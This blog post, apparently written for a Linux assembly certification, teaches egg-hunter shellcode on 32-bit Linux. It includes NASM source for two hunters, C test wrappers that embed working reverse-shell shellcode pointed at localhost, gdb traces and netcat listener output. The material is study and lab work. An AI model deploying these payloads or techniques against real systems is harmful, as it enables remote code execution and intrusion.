Egg Hunters on Linux

In this blog post I will discuss egg hunters. What are egg hunters, why and how to use them.

Before I dive into realm of egg hunters it will be convenient to quickly recap basics of VAS (Virtual Address Space) model for Linux platform.

VAS – Virtual Address Space

For every running process there is created 4GB virtual memory which consists of following memory segments (blue)

Related image

Address space in virtual memory is mapped to physical memory by kernel page tables(1).

Kernel space mappings are static and available for each process. For example system calls provided by kernel are available for all processes on same virtual addresses.

Other memory segments fall into user-mode space and contains dynamic memory mappings. Such mappings are randomly generated every time a new process is started. Linux randomizes location of stack, heap and memory mapping segment. Such mechanism is known as ASLR (Address Space Layout Randomization).

If process tries to reference unmapped memory regions (white) it is terminated by segmentation fault.

These were few most important VAS facts which you need to know to grasp egg hunters comfortably. For friendly discussion of VAS check Gustavo Duarte’s post.

What are and why to use egg hunters ?

Imagine that you have shellcode which is needed to be encrypted or obfuscated. Such shellcodes rise in size quickly. Moreover executable memory space which you find in process’ VAS is that tight that it will not store even 50 bytes worth of opcodes. Well at least you find out that you are able to indirectly overwrite larger memory block somewhere else in VAS.

Now you need kind of memory crawl shellcode which will fit 50 bytes and which searches for your larger payload in user-mode region of VAS. This shellcode is called egg hunter. Egg is unique sequence of bytes which is located at fixed offset from a payload (usually sticked just before payload).

Generally we can divide egg hunters by robustness

  • egg hunters without unmapped memory check
  • egg hunters with unmapped memory check

Egg hunters which don’t check unmapped addresses can crawl just mapped addresses. This implies that there mustn’t be unmapped address between crawler starting address and egg location otherwise a process gets terminated by segmentation fault. These egg hunters can be as small as 11 bytes.

Egg hunters which checks for unmapped addresses can crawl over such addresses without receiving segmentation fault. These egg hunters bypass ASLR as they crawl entire user-mode space. However this ability inflates their size to 30-50 bytes.

Example: Egg hunter without unmapped memory check

Assembly code for egg hunter

; File: egghunter_no_memcheck.nasm


global _start

section .text

_start:

    ; suppose we know our payload is located somewhere in stack
    ; so let crawler start from ESP
    mov eax, esp

    ; define egg
    ; note that egg must contain valid opcodes because
    ; it will get executed before payload
    mov edx, 0x464e464e     ; inc esi, dec esi, inc esi, dec esi

search_first_egg:

    inc eax                 ; step to next byte
    cmp dword [eax], edx    ; compare 4 bytes in eax and egg in edx
    jne search_first_egg    ; repeat loop if not match

search_second_egg:

    ; CAUTION
    ; Egg will be contained in .data section of binary which
    ; will be created using this egg hunter shellcode
    ; If you are crawling even .data section you must count with that.
    ; Prepend the payload shellcode twice and let the egg hunter find
    ; two consecutive eggs.

    cmp dword [eax+4], edx
    jne search_first_egg

egg_found:

    ; load eip with eax, execute egg, execute payload
    jmp eax

Compile .nasm file into object file(2)

$ nasm -f elf32 -o egghunter_no_memcheck.o egghunter_no_memcheck.nasm

Create binary file from object file

$ ld -o egghunter_no_memcheck egghunter_no_memcheck.o

Check for null bytes(3)

$ objdump -M intel -d egghunter_no_memcheck | grep 00

Extract shellcode from binary

$ objdump -d ./egghunter_no_memcheck|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Insert it into testing C wrapper

// File: shellcode_no_memcheck.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// remember egg hunter assembly, mov edx, 0x464e464e
#define EGG "\x4e\x46\x4e\x46"

// this line inserts 1x EGG string to binary .data section
unsigned char egg[] = EGG;

// this line inserts 1x EGG string to binary .data section
unsigned char egghunter[] = \
"\x89\xe0\xba\x4e\x46\x4e\x46\x40\x39\x10\x75\xfb\x39\x50\x04\x75\xf6\xff\xe0";

unsigned char shellcode[] = \
"\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x5b\x68\x7f\x01\x01\x01\x66\x68\x13\xba\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x87\xde\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x41\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xf7\xe1\xb0\x0b\xcd\x80";

main()
{
    printf("Egghunter Length:  %d\n", sizeof(egghunter) - 1);

    char stack[200];
    printf("Memory location of shellcode: %p\n", stack);

    // these 2 lines insert 2x EGG strings to binary [stack] section
    strcpy(stack, egg);
    strcpy(stack + 4, egg);
    strcpy(stack + 8, shellcode);

    int (*CodeFun)() = (int(*)())egghunter;
    CodeFun();
}

I use reverse shell which connects to localhost:5050 which I developed in previous post.

Compile testing C code without buffer overflow stack protection and allow executable stack with -z flag which is passed to the linker

$ gcc -fno-stack-protector -z execstack shellcode_no_memcheck.c -o shellcode_no_memcheck

Let’s inspect what’s happening inside the program with gdb. Set breakpoint to egghunter variable and run the program.

(gdb) break *&egghunter
(gdb) disas
=> 0x0804a045 <+0>: mov eax,esp
0x0804a047 <+2>: mov edx,0x464e464e
0x0804a04c <+7>: inc eax
0x0804a04d <+8>: cmp DWORD PTR [eax],edx
0x0804a04f <+10>: jne 0x804a04c
0x0804a051 <+12>: cmp DWORD PTR [eax+0x4],edx
0x0804a054 <+15>: jne 0x804a04c
0x0804a056 <+17>: jmp eax
0x0804a058 <+19>: add BYTE PTR [eax],al
(gdb) x/110bx $esp
0xbffff224: 0x60 0xa0 0x04 0x08 0xd0 0xfa 0xff 0xb7
0xbffff22c: 0x44 0xf3 0xff 0xbf 0x00 0xf3 0xff 0xbf
0xbffff234: 0x4e 0x46 0x4e 0x46 0x4e 0x46 0x4e 0x46
0xbffff23c: 0x6a 0x66 0x58 0x6a 0x01 0x5b 0x31 0xc9
0xbffff244: 0x51 0x53 0x6a 0x02 0x89 0xe1 0xcd 0x80
0xbffff24c: 0x89 0xc6 0xb0 0x66 0x5b 0x68 0x7f 0x01
0xbffff254: 0x01 0x01 0x66 0x68 0x13 0xba 0x66 0x53
0xbffff25c: 0x89 0xe1 0x6a 0x10 0x51 0x56 0x89 0xe1
0xbffff264: 0x43 0xcd 0x80 0x87 0xde 0x6a 0x02 0x59
0xbffff26c: 0xb0 0x3f 0xcd 0x80 0x49 0x79 0xf9 0x41
0xbffff274: 0x51 0x68 0x6e 0x2f 0x73 0x68 0x68 0x2f
0xbffff27c: 0x2f 0x62 0x69 0x89 0xe3 0xf7 0xe1 0xb0
0xbffff284: 0x0b 0xcd 0x80
0x00 0x00 0x00

Egghunter crawls the stack byte by byte until it finds the egg which is located on 0xbffff234. Then EIP is loaded with egg starting address and program continues execution from this point. Notice that you are not able to disassemble own shellcode in this case because it wasn’t recast to function pointer in shellcode_no_memcheck.c. If you try to disassemble when stepping through the shellcode you will get

(gdb) disas
No function contains program counter for selected frame

but instructions will get executed correctly. However

(gdb) x/50i $eip

gdb command can be used to interpret bytes in memory as instructions.

If you continue program execution you will get reverse shell on localhost:5050

$ nc -nvl 127.1.1.1 5050
Connection from 127.0.0.1 port 5050 [tcp/*] accepted
whoami
maple

Example: Egg hunter with unmapped memory check

In this example I use sigaction() call to check for valid memory address. There exists few more techniques described in this paper.

Scenario

Let the egg+egg+shellcode be somewhere in heap process memory. Now we don’t know location from which we need to start crawling as there doesn’t exist nothing like “EHP” (Extended Heap Pointer), there is no way to reference crawl starting point in egg hunter. We need to crawl entire process’ VAS. Without doubt egg hunter must crawl long way to reach heap segment. Egg hunter must crawl over .text > .data > .bss > unmapped memory > and finally heap. Every address must be checked before accessing otherwise we get segmentation fault in unmapped memory.

sigaction() system call

Originally sigaction() system call is used to change the action taken by a process on receipt of a specific signal. However its behaviour can be leveraged to check for valid memory without receiving SIGSEGV signal.

sigaction() signature is

int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);

What is of paramount interest for us is that if act argument points to memory which is not a valid part of the process address space the sigaction() returns EFAULT code. sigaction structure has size of 16 bytes so if address is checked and sigaction() doesn’t return EFAULT we have 16 consecutive bytes of valid memory starting from checked address.

Assembly code

From /usr/include/i386-linux-gnu/asm/unistd_32.h we have system call number

define __NR_sigaction           67

From /usr/include/asm-generic/errno-base.h we have EFAULT error number

define EFAULT          14      /* Bad address */

Assembly code for egg hunter

; File: egghunter_memcheck.nasm

global _start

section .text

_start:

next_page:
    ; add 4095 to ecx via bitwise or
    or cx, 0xfff

next_address:

    inc ecx                 ; align to multiples of 4096 
    
    ; sigaction() syscall 67 = 0x43
    push byte +0x43
    pop eax
    
    ; execute sigaction()
    ; eax=0x43, ebx=not_set, ecx=current_page, edx=not_set
    int 0x80
    
    ; check for EFAULT
    ; Code for EFAULT is -14=0xfffffff2
    ; Checking just for last byte
    cmp al, 0xf2
    
    ; If EFAULT jump to next page in memory
    jz next_page
    
    ; If valid memory
    ; set eax=egg, edx=address_to_be checked
    ; scasd compares both registers content
    ; if eax==edi then edi+=4
    mov eax, 0x464e464e
    mov edi, ecx
    
    scasd
    jnz next_address    ; jump if eax!=edi
    
    ; check for second egg occurrence
    scasd
    jnz next_address    ; jump if eax!=edi+4
    
    ; egg found twice, edi was increased 2x4 bytes by scasd
    ; so it now points directly to shellcode
    jmp edi

scasd instruction stands for scan string dword. Note that unmapped memory addresses are crawled by pages(4) meanwhile mapped addresses by single bytes.

Compiling and testing assembly code

Compile .nasm file into object file(2)

$ nasm -f elf32 -o egghunter_memcheck.o egghunter_memcheck.nasm

Create binary file from object file

$ ld -o egghunter_memcheck egghunter_memcheck.o

Check for null bytes(3)

$ objdump -M intel -d egghunter_memcheck | grep 00

Extract shellcode from binary

$ objdump -d ./egghunter_memcheck|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Insert it into testing C wrapper

// File: shellcode_memcheck.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// remember egg hunter assembly, mov edx, 0x464e464e
#define EGG "\x4e\x46\x4e\x46"

// this line inserts 1x EGG string to binary .data section
char egg[] = EGG;

// this line inserts 1x EGG string to binary .data section
unsigned char egghunter[] = \
"\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x4e\x46\x4e\x46\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";

unsigned char shellcode[] = \
"\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x5b\x68\x7f\x01\x01\x01\x66\x68\x22\xb8\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x87\xde\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x41\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xf7\xe1\xb0\x0b\xcd\x80";

main()
{
    printf("Egghunter Length:  %d\n", sizeof(egghunter) - 1);

    char *heapMemory;
    heapMemory = malloc(300);

    // these 2 lines insert 2x EGG strings to binary [heap] section
    memcpy(heapMemory + 0, egg, 4);
    memcpy(heapMemory + 4, egg, 4);
    memcpy(heapMemory + 8, shellcode, sizeof(shellcode) + 1);

    printf("Memory location of shellcode: %p\n", heapMemory);

    int (*CodeFun)() = (int(*)())egghunter;
    CodeFun();

    free(heapMemory);
}

In this case the egg+egg+shellcode is located in heap segment.

Compile testing C code without buffer overflow stack protection and allow executable stack with -z flag which is passed to the linker

$ gcc -fno-stack-protector -z execstack shellcode_memcheck.c -o shellcode_memcheck

Executing shellcode we get reverse shell on port 8888

$ nc -nvl 8888 Connection from 127.0.0.1 port 8888 [tcp/*] accepted whoami
maple

Analysis with GDB

Let’s quickly inspect innards of the egg hunter with gdb.

Fire up gdb and set breakpoint to egghunter

(gdb) break *&egghunter
(gdb) run
(gdb) disas
=> 0x0804a048 <+0>: or cx,0xfff
0x0804a04d <+5>: inc ecx
0x0804a04e <+6>: push 0x43
0x0804a050 <+8>: pop eax
0x0804a051 <+9>: int 0x80
0x0804a053 <+11>: cmp al,0xf2
0x0804a055 <+13>: je 0x804a048
0x0804a057 <+15>: mov eax,0x464e464e
0x0804a05c <+20>: mov edi,ecx
0x0804a05e <+22>: scas eax,DWORD PTR es:[edi]
0x0804a05f <+23>: jne 0x804a04d
0x0804a061 <+25>: scas eax,DWORD PTR es:[edi]
0x0804a062 <+26>: jne 0x804a04d
0x0804a064 <+28>: jmp edi
0x0804a066 <+30>: add BYTE PTR [eax],al

Inspect virtual memory of the process

(gdb) info proc mappings
process 22460
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x8048000 0x8049000 0x1000 0x0 /mnt/hgfs/share/SLAE_exam/problem3/shellcode_memcheck
0x8049000 0x804a000 0x1000 0x0 /mnt/hgfs/share/SLAE_exam/problem3/shellcode_memcheck
0x804a000 0x804b000 0x1000 0x1000 /mnt/hgfs/share/SLAE_exam/problem3/shellcode_memcheck
0x8768000 0x8789000 0x21000 0x0 [heap]
0xb7553000 0xb7554000 0x1000 0x0
0xb7554000 0xb76f8000 0x1a4000 0x0 /lib/i386-linux-gnu/libc-2.15.so
0xb76f8000 0xb76f9000 0x1000 0x1a4000 /lib/i386-linux-gnu/libc-2.15.so
0xb76f9000 0xb76fb000 0x2000 0x1a4000 /lib/i386-linux-gnu/libc-2.15.so
0xb76fb000 0xb76fc000 0x1000 0x1a6000 /lib/i386-linux-gnu/libc-2.15.so
0xb76fc000 0xb76ff000 0x3000 0x0
0xb770e000 0xb7711000 0x3000 0x0
0xb7711000 0xb7712000 0x1000 0x0 [vdso]
0xb7712000 0xb7732000 0x20000 0x0 /lib/i386-linux-gnu/ld-2.15.so
0xb7732000 0xb7733000 0x1000 0x1f000 /lib/i386-linux-gnu/ld-2.15.so
0xb7733000 0xb7734000 0x1000 0x20000 /lib/i386-linux-gnu/ld-2.15.so
0xbfc36000 0xbfc57000 0x21000 0x0 [stack]

In the first egg hunter loop the ECX is set to 0x1000 (4096) which obviously doesn’t belong to current virtual address space. Thus we get 0xfffff2(-14) in EAX and program flow jumps to next memory page(4).

(gdb) disas
0x0804a051 <+9>: int 0x80
=> 0x0804a053 <+11>: cmp al,0xf2
0x0804a055 <+13>: je 0x804a048 <egghunter>
(gdb) p/x $eax
$3 = 0xfffffff

Next validated address in ECX is 0x1fff (8192) and so on till egg hunter finds a valid address. The first valid process address is 0x8048000 which is start of .text segment

0x8048000  0x8049000     0x1000        0x0 /mnt/hgfs/share/SLAE_exam/problem3/shellcode_memcheck

As we know in .data section should be located two single eggs coming from the compiled C file from these lines

// first single occurrence
char egg[] = EGG;
// second single occurrence
unsigned char egghunter[] = \
"\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x4e\x46\x4e\x46\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";

Searching valid memory space byte by byte discovers egg in .data section at 0x804a040 and 0x804a058.

(gdb) disas
0x0804a05f <+23>: jne 0x804a04d
=> 0x0804a061 <+25>: scas eax,DWORD PTR es:[edi]
0x0804a062 <+26>: jne 0x804a04d
(gdb) x/wx $ecx
0x804a040 : 0x464e464e
(gdb) c
(gdb) x/wx $ecx
0x804a058 : 0x464e464e
(gdb) maintenance info sections
0x804a020->0x804a0cc at 0x00001020: .data ALLOC LOAD DATA HAS_CONTENTS

However second scasd comparison will not pass and scanning byte by byte continues till sigaction() meets invalid memory region on 0x804aff1. This address still belongs to

0x804a000  0x804b000     0x1000     0x1000 /mnt/hgfs/share/SLAE_exam/problem3/shellcode_memcheck

but sigaction() checks address range (0x804aff1, 0x804aff1+0x16) and right bound lies outside valid memory.

If we let the program continue until

(gdb) disas
0x0804a062 <+26>: jne 0x804a04d
=> 0x0804a064 <+28>: jmp edi
0x0804a066 <+30>: add BYTE PTR [eax],al

we see that egg hunter found two consecutive occurrencies of egg starting at 0x8768008

(gdb) x/2wx $ecx
0x8768008: 0x464e464e 0x464e464e

located near lower bound of heap memory

0x8768000  0x8789000    0x21000        0x0 [heap]

2nd occurrence of egg is directly followed by the shellcode

(gdb) x/90bx $ecx
0x8768008: 0x4e 0x46 0x4e 0x46 0x4e 0x46 0x4e 0x46
0x8768010: 0x6a 0x66 0x58 0x6a 0x01 0x5b 0x31 0xc9
0x8768018: 0x51 0x53 0x6a 0x02 0x89 0xe1 0xcd 0x80
0x8768020: 0x89 0xc6 0xb0 0x66 0x5b 0x68 0x7f 0x01
0x8768028: 0x01 0x01 0x66 0x68 0x22 0xb8 0x66 0x53
0x8768030: 0x89 0xe1 0x6a 0x10 0x51 0x56 0x89 0xe1
0x8768038: 0x43 0xcd 0x80 0x87 0xde 0x6a 0x02 0x59
0x8768040: 0xb0 0x3f 0xcd 0x80 0x49 0x79 0xf9 0x41
0x8768048: 0x51 0x68 0x6e 0x2f 0x73 0x68 0x68 0x2f
0x8768050: 0x2f 0x62 0x69 0x89 0xe3 0xf7 0xe1 0xb0
0x8768058: 0x0b 0xcd 0x80
0x00 0x00 0x00 0x00 0x00
0x8768060: 0x00 0x00

EDI contains beginning of the shellcode because it was incremented by 2×4 bytes by two successful scasd instructions

(gdb) p/x $edi
$9 = 0x8768010

load EDI into EIP and enjoy your reverse shell on localhost:8888

=> 0x0804a064 <+28>:    jmp    edi
(gdb) c

$ nc -nvl 8888
Connection from 127.0.0.1 port 8888 [tcp/*] accepted
whoami
maple

(1) A page table is the data structure used by a virtual memory system in a computer operating system to store the mapping between virtual addresses and physical addresses. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by the hardware, or more specifically, by the RAM subsystem.

(2) Object file contains low level instructions which can be understood by the CPU. That is why it is also called machine code. This low level machine code is the binary representation of the instructions so it can be disassembled by objectdump. Object file is not directly executable.

(3) Shellcode must be free of null bytes because they are used as C string terminators in many C functions. Leaving null bytes in shellcode can lead to undefined shellcode behaviour and hard-to-find bugs.

(4) A page, memory page, or virtual page is a fixed-length contiguous block of virtual memory, described by a single entry in the page table. It is the smallest unit of data for memory management in a virtual memory operating system.


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification

Github code

Student ID: SLAE-1443

Leave a Reply